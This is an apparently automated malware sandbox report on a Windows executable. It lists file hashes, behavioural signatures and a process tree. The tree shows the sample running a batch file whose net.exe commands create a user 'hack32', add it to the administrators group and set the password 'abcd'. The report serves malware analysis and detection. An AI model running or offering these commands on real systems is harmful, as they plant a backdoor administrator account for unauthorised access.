Analysis

  • max time kernel
    67s
  • max time network
    54s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/04/2024, 22:31

General

  • Target

    0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe

  • Size

    120KB

  • MD5

    0636ca1a0acb3e040b06234b31ac1d7b

  • SHA1

    48a9a582f86312f5ad41ee4112e765fcdb9c6ce0

  • SHA256

    3d3f357e4ad24e91c3e7bf4d93357b4aba1e31c23829eb1b7f434676de89862e

  • SHA512

    616ef9833e03c5c72e6328b16c7053ed1064adef771e4cf0092c60b8aee27c86a1e7cb3a069dec017e9ba4284ba17b9c9e88acf485c7ed8affaedb27afe84569

  • SSDEEP

    3072:4V3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPdL:Vt5hBPi0BW69hd1MMdxPe9N9uA069TBB

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4756
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3400.tmp\3401.tmp\3402.bat C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\system32\net.exe
        net user hack32 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user hack32 /add
          4⤵
          PID:1548
      • C:\Windows\system32\net.exe
        net localgroup administrateurs hack32 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4316
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup administrateurs hack32 /add
          4⤵
          PID:3776
      • C:\Windows\system32\net.exe
        net user hack32 abcd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user hack32 abcd
          4⤵
          PID:1204

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3400.tmp\3401.tmp\3402.bat

    Filesize

    97B

    MD5

    ff8f2a3d62844ae2cbd5fe4e8d0c6a57

    SHA1

    87d5b055c1fb58c4922d40895c9960181255775b

    SHA256

    c9c8d929834a7b24149b93e53c5b3b295580bc7e2866314281e59e91d68e7293

    SHA512

    71fdd1dcd93120a38518b532173728ebd8b98ae2a9856d84301ba61a3f324fae1a8bfbc3ef6713ecb44093aee010b448a69282ca015caba900a6b585cb74d3f0